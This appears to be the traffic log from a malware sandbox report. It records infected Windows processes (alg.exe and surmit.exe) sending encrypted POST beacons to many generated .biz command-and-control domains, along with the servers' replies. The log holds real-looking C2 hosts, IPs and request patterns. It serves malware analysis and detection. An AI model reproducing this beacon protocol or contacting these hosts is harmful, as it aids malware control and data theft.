Nov 28, 2024 06:41:13.033898115 CET	358	OUT	POST /rmpctvmhvfmcakj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:41:13.033910036 CET	778	OUT	Data Raw: 43 7d 02 09 a4 73 15 30 fe 02 00 00 22 b3 14 56 f2 43 1d 03 0c 50 3a 21 f9 f9 bb e5 c2 e4 b5 5f d5 91 fe 63 fd fd 82 01 64 76 01 76 8b b8 5b f2 cf 3b eb 96 15 3c bc 07 3e 04 34 71 2e 10 af a6 7f 95 c2 bb 32 cd 0f 19 9f fc e4 2e b4 cd 0a 5a f6 4f Data Ascii: C}s0"VCP:!_cdvv[;<>4q.2.ZOZcL6qcqgGsb@'eYLlEY8<f%l>dXC_H:\_">XmEHl WcK0Q>S9u#W7qLc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49742	18.141.10.107	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:15.154457092 CET	347	OUT	POST /dss HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:41:15.154475927 CET	778	OUT	Data Raw: c1 b1 ce 1f e1 69 96 2e fe 02 00 00 6b 8a 30 6d 51 f6 74 b1 96 49 23 87 43 f1 fc 76 47 2f 65 96 b5 eb 74 2d 25 3f 61 c7 b1 2e e3 8e 8e 8e c9 f4 83 f8 25 05 4b 19 5a 4b 07 4e f1 70 e5 6c c0 7c 92 15 23 ea 55 93 c8 41 99 d3 37 bb 3b 3f d1 30 f1 21 Data Ascii: i.k0mQtI#CvG/et-%?a.%KZKNpl\|#UA7;?0!5v{76+9jb$@2J+,ZBJc/GJ_m$tkhq8KGUA_l!u(2EnUL8bR9^XK3GtWhUI\|rhcjS_M
Nov 28, 2024 06:41:17.247318983 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:41:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=1c7550f00b3d77493bedde778e397528\|8.46.123.228\|1732772476\|1732772476\|0\|1\|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49743	54.244.188.177	80	2852	C:\Users\user\AppData\Local\bothsided\surmit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:16.209794998 CET	350	OUT	POST /wblsu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Nov 28, 2024 06:41:16.209805012 CET	826	OUT	Data Raw: 29 c4 58 21 2d 01 0a 0d 2e 03 00 00 dc 39 d6 6f 86 32 c3 75 8d 82 dd 81 8c 68 ea c9 11 93 20 b9 ce 66 4d 02 5e 0c a1 07 fa a9 37 ee e0 00 fa d1 03 20 42 a9 3d 86 90 5a fb 45 75 78 0e 53 5e 59 58 c6 45 66 55 da 72 6b f2 6d 23 2f 13 c8 fe 71 9e 4c Data Ascii: )X!-.9o2uh fM^7 B=ZEuxS^YXEfUrkm#/qL{B:au?&2$%%T$qx~EzC~:"~!DU?2G/^+-RDOvM(t1_y*%A\|Fs}D>#X<YsXw;'(z=xA/~
Nov 28, 2024 06:41:17.603754997 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:41:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=d712042b0f26dae1e78f195b71a40cda\|8.46.123.228\|1732772477\|1732772477\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49746	82.112.184.197	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:18.877469063 CET	355	OUT	POST /lmjmtfvnnmvba HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:41:18.877494097 CET	778	OUT	Data Raw: 16 6f 1e 51 a4 d4 fb d2 fe 02 00 00 4a d0 bd b1 82 a7 c1 94 77 1f 93 de 42 1e 5f df 0f 60 e3 76 50 db 2c f2 2e f0 9c be a5 41 a8 f2 9d 79 68 de 31 72 cf a9 4b 85 36 ce f4 17 61 9e 74 e3 0d 8f 0a 5a 7f 3a 72 f1 a9 81 d4 00 4a 0e e3 d7 e3 74 68 d6 Data Ascii: oQJwB_`vP,.Ayh1rK6atZ:rJthh{d\|<tJ PZ1hErmd-A]Z{LTafEyNhuA>6+c]@<zS<beQ:N+*iLnj_S--O6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49747	54.244.188.177	80	7392	C:\Users\user\AppData\Local\bothsided\surmit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:19.012722015 CET	349	OUT	POST /chev HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Nov 28, 2024 06:41:19.012794971 CET	826	OUT	Data Raw: d7 81 5f a1 f6 99 00 49 2e 03 00 00 45 08 da 11 1a 17 f6 a5 12 9c 5c 71 6b 26 e5 3a 35 c2 cb 40 d9 6c cd 04 1c 8f 12 a7 3e b8 cc a8 0a 34 ad 7f 04 2f f7 99 57 00 56 ab 56 69 63 e0 d6 cf de a9 0f ec d3 ed 1d b1 fc 2f f4 3b 27 69 1f df a8 80 d3 f9 Data Ascii: _I.E\qk&:5@l>4/WVVic/;'ix>t!7?Wr5PF3>[aKZ{ L-S3qe"^m<;YAl5mOlg9ZC>moj<bb
Nov 28, 2024 06:41:20.422471046 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:41:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=378dc4aee428e33b07fe991d443e8e92\|8.46.123.228\|1732772480\|1732772480\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49753	82.112.184.197	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:41.192142010 CET	345	OUT	POST /abs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:41:41.192178965 CET	778	OUT	Data Raw: b2 22 4d 4c fd 4e dd 9d fe 02 00 00 2f 60 9d 47 77 dc d4 d6 6d 6d 17 05 d3 41 d0 29 90 c1 8c 14 58 b8 d5 b2 2c 75 f5 7c 8d ad 03 f9 f8 4c 31 20 f6 01 aa 49 90 8c eb 70 28 bc 09 ea f3 3e ac 68 98 59 93 93 76 7f df 6b ec ea e6 9d b2 d6 28 40 ed c0 Data Ascii: "MLN/`GwmmA)X,u\|L1 Ip(>hYvk(@DA >;3*Owok[dbb4en-IT2~B?wFY=IvYU'3W)z`i\D1RNif/$MZ6FZe\#%h\_DAvnDPOcyyRB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49766	82.112.184.197	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:42:04.291003942 CET	350	OUT	POST /smway HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:42:04.291003942 CET	778	OUT	Data Raw: db ad e4 ec b9 d5 69 a3 fe 02 00 00 73 be fd 56 22 1e 53 f5 f5 79 b5 67 39 e9 c2 76 01 9b 27 22 30 7a a5 32 43 8c cd 73 15 33 eb 6e 6a 5e 1a 98 fc a0 83 6d 63 2e 97 98 a7 f5 1c 00 08 45 2e df 8b 4d c8 7f 0b 26 af 2c cf a6 15 8f f2 57 0b 37 03 17 Data Ascii: isV"Syg9v'"0z2Cs3nj^mc.E.M&,W7kpMfoS#8^/)4FJ3Lr%Go?`eS]SX.gvay5Ba)hYCYD*%~p`oj?spXaQ%Jg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49810	82.112.184.197	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:42:27.438092947 CET	358	OUT	POST /cnuoabdloqrfy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:42:27.438123941 CET	778	OUT	Data Raw: 0c d5 4c e3 d7 bd f6 ff fe 02 00 00 e6 e9 84 51 86 88 c1 1b 4d af f0 dd a7 16 35 1f 9e c2 c6 22 1d 33 4e 98 90 91 b3 88 85 9b e6 d9 c9 ef 42 79 37 77 1a cd 07 f7 09 80 4c e4 f4 58 06 90 9c b4 e2 bc ae 1a 4b 3e 5a 97 05 32 53 1c f2 1d 22 16 1d b9 Data Ascii: LQM5"3NBy7wLXK>Z2S"L%u^\|=H~hfIxZ=)\|/Om=:wNinVU#,Kw(n5#$8>u*e}b#$1'A+rKN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49860	47.129.31.212	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:42:49.986962080 CET	350	OUT	POST /woygorb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:42:49.987052917 CET	778	OUT	Data Raw: 26 85 56 47 bb 37 26 61 fe 02 00 00 6e e5 df 8b fb 49 f8 58 a6 54 7a c2 ce 64 a1 75 ad 85 37 94 7d 18 5d c0 22 8e 4b 65 bc 61 4d b9 dc 2f d9 92 e9 e1 93 8b c8 42 b9 52 a0 06 f6 f6 d7 55 7c 53 8d 2f f4 fb 99 cc c8 85 53 d3 7d f3 73 fa 28 53 74 f4 Data Ascii: &VG7&anIXTzdu7}]"KeaM/BRU\|S/S}s(Sts\|,M+e8FGIK1X3yM/+oF:OII:{2f1\PmixhxaM:)FJ[{,`<~zoPm(f9,;O9
Nov 28, 2024 06:42:52.000524998 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:42:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c764db48c1dd6d60fd0a1e5ed72f8807\|8.46.123.228\|1732772571\|1732772571\|0\|1\|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49866	13.251.16.150	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:42:52.599111080 CET	356	OUT	POST /qcekrwvgvvohof HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:42:52.599111080 CET	778	OUT	Data Raw: ed 13 3d 1c d9 44 0f bb fe 02 00 00 9a 7a 14 bf 82 93 36 ef f7 65 e6 9b 3d 5b 89 9b b2 46 7d 04 e5 5d d3 5b 4f 25 aa 8a 09 5b 75 fc 3f 2b d3 47 19 15 61 8b 93 07 3f 94 15 b4 8a e0 e5 f7 3e bf f9 79 5f 67 b4 db 80 e2 5f 24 15 e0 af 4d 49 11 2d 5a Data Ascii: =Dz6e=[F}][O%[u?+Ga?>y_g_$MI-Z1to,G[fJSl?dCpv+qt%e*A$0& >W~pTuN5t=A@cqc_D'vWPFb@VWatZ
Nov 28, 2024 06:42:54.748186111 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:42:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=f759a8a88a6f14acbdee4d08cf825589\|8.46.123.228\|1732772574\|1732772574\|0\|1\|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49875	44.221.84.105	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:42:55.355074883 CET	351	OUT	POST /wrtcay HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:42:55.355074883 CET	778	OUT	Data Raw: 45 2b 0f 0f b6 b6 0b 83 fe 02 00 00 7f 9d bc a6 76 f0 f2 8b 2e 61 fe 1e 82 94 a8 57 2d 1f 96 77 cb fb 95 41 02 a3 ef 10 f5 db 79 2e f5 dc e7 70 49 3c 5a 98 13 27 30 50 46 aa 84 68 45 4c c1 42 05 6e 32 37 23 cf 43 f1 6c e0 45 09 12 0b 2a 83 be 3b Data Ascii: E+v.aW-wAy.pI<Z'0PFhELBn27#ClE;f$Bb6r;&pIp:<U'U ICGa&.\gB.9Ls7Z>`.{yJ:.}MQ2Z6h\\|-E_L@2=K,(*;eK4enH
Nov 28, 2024 06:42:56.502722979 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:42:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=324f7eac9bfa809af6f9b5bd12040356\|8.46.123.228\|1732772576\|1732772576\|0\|1\|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49880	18.141.10.107	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:42:57.315104961 CET	349	OUT	POST /fffkga HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:42:57.315164089 CET	778	OUT	Data Raw: 7a 28 83 b2 12 18 c5 f5 fe 02 00 00 90 17 4f a3 3d 3e 47 be af ff 94 04 d9 78 72 10 3b a8 78 10 e0 96 9f a8 7f 18 3e 77 d2 3d 56 37 b3 d5 76 9a a7 54 9a 40 d8 75 1e 90 7f ce 7d 0b 44 77 85 0c 6e 99 14 e7 0f 09 34 a2 19 c6 22 30 f0 f4 cf 35 c2 56 Data Ascii: z(O=>Gxr;x>w=V7vT@u}Dwn4"05V?NT+J/xHD yO7cFr^X#tMA_X~,$Y#VeBy:$s+h7&X7qg{16QV~[]4;_1.YZ-$<f?S:CX
Nov 28, 2024 06:42:59.387933016 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:42:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=556fe0b8dc3e11ea68d94ff4fa68b40f\|8.46.123.228\|1732772578\|1732772578\|0\|1\|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49885	172.234.222.143	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:42:59.834724903 CET	352	OUT	POST /hebjmwuaims HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:42:59.834789991 CET	778	OUT	Data Raw: 0e 08 ea c8 ce 4c d3 2b fe 02 00 00 99 25 bb 58 12 45 9c d3 25 53 ae bf 81 42 2b 11 5e 76 d7 14 3f 25 dd 3f 41 b2 9c 74 55 09 a6 a2 da ce 9b 09 74 19 f6 02 2a 6a d7 e6 f9 44 46 e3 75 03 b8 6e d5 d0 bb 08 16 1c 19 52 0c 08 3b c5 fc 55 a4 35 74 2e Data Ascii: L+%XE%SB+^v?%?AtUtjDFunR;U5t.\|J<n:V%(VzYDe`9;'el!{.!pP9UVe$Ajjb;(pHN,\|kt:vXPi^V#+x#j,oe_\|\|%!Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49887	172.234.222.143	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:01.143095016 CET	353	OUT	POST /lrhpwoxhabbo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:01.143116951 CET	778	OUT	Data Raw: cb 9d cb 44 00 c9 23 e2 fe 02 00 00 a7 21 87 d7 b4 75 4b 40 65 f9 ae c4 21 6d 99 98 40 ae 9f 01 fd 66 fb c9 64 f2 5d 60 cc 8f 7f 1b cd 6e 65 80 66 fb 79 61 0f 43 3e 8f 5e 69 12 f9 29 59 c7 ac ac 6d d2 46 e6 f3 50 3c 9c b8 c7 a2 78 0c e2 f8 ba 84 Data Ascii: D#!uK@e!m@fd]`nefyaC>^i)YmFP<xH_c9cC\|T;[O`p7\|a_Id36Wp_)M@JvH*?F4#:\.td`X\j;S188,M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49890	34.246.200.160	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:03.034466982 CET	344	OUT	POST /do HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:03.034507990 CET	778	OUT	Data Raw: 32 7c fc 11 01 d4 e8 b7 fe 02 00 00 9c 68 67 09 9b 39 22 9e d5 9f 09 85 19 f9 9e a5 e6 a8 75 15 ff 79 c5 da 5e 87 27 c8 4d a8 26 8a 80 8f f3 5b 52 9e fa 37 75 d1 33 2c a3 8e 04 84 93 64 a5 02 29 a5 f2 e3 cf 3f 04 eb bb 95 a8 be fa ff 89 d7 cc 65 Data Ascii: 2\|hg9"uy^'M&[R7u3,d)?ebErPPpRt_W9LTdbWeP`JT;gxg&X^Xm8D2)6pw&RPk_dtm[oGJ0bRYZL8Z_\
Nov 28, 2024 06:43:04.468040943 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=f6b6d22ce86bb741610a09507b6bab89\|8.46.123.228\|1732772584\|1732772584\|0\|1\|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49896	18.208.156.248	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:05.436033010 CET	355	OUT	POST /rioahhbhdoogcd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:05.436098099 CET	778	OUT	Data Raw: fd 53 eb 87 f4 99 d7 c7 fe 02 00 00 d8 43 92 5d 73 eb d8 d5 e4 17 e2 8a 3b 01 fe 50 ce 3f e3 bf 60 91 df ec 22 81 f4 93 33 dd 66 54 42 ca 9a 3e ca 42 ce c3 55 96 94 39 67 c3 3e a5 d0 8a ec 43 8e 62 d6 7d d8 ee 67 41 6f 9c c3 b2 2c 89 e1 35 83 29 Data Ascii: SC]s;P?`"3fTB>BU9g>Cb}gAo,5)+<e!ut;%B$ E%BzNeozYvp>\0&Hz]Yl910$nbB%Qwg4zGSP4#??jy3-Q$2"
Nov 28, 2024 06:43:06.585114956 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=7da707511063671f5c3699528690d0fd\|8.46.123.228\|1732772586\|1732772586\|0\|1\|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49900	208.100.26.245	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:07.402229071 CET	349	OUT	POST /vfyfu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:07.402255058 CET	778	OUT	Data Raw: 64 1a 1a 20 af 10 f0 b4 fe 02 00 00 32 f0 7d ea d8 ad 8e 2f 94 f5 35 88 78 1e 7c f9 ea ad ef da 1a f4 8b fa c6 b3 3e 90 00 78 0c 63 09 36 88 1f f8 f2 4b 2e 6a dc 1b 25 21 33 9f 34 0c 26 be 5f 87 2c 5c 7f 30 cd 0c 41 b9 cf 88 fe d6 b9 e7 58 a8 ad Data Ascii: d 2}/5x\|>xc6K.j%!34&_,\0AX5]2M#tg{9NRrpb"7K"%o^@Qq2z192[O{TWQ<2^k8(=sT8^N`(JqrlQXOG-6_Wgz;
Nov 28, 2024 06:43:08.529895067 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Thu, 28 Nov 2024 05:43:08 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 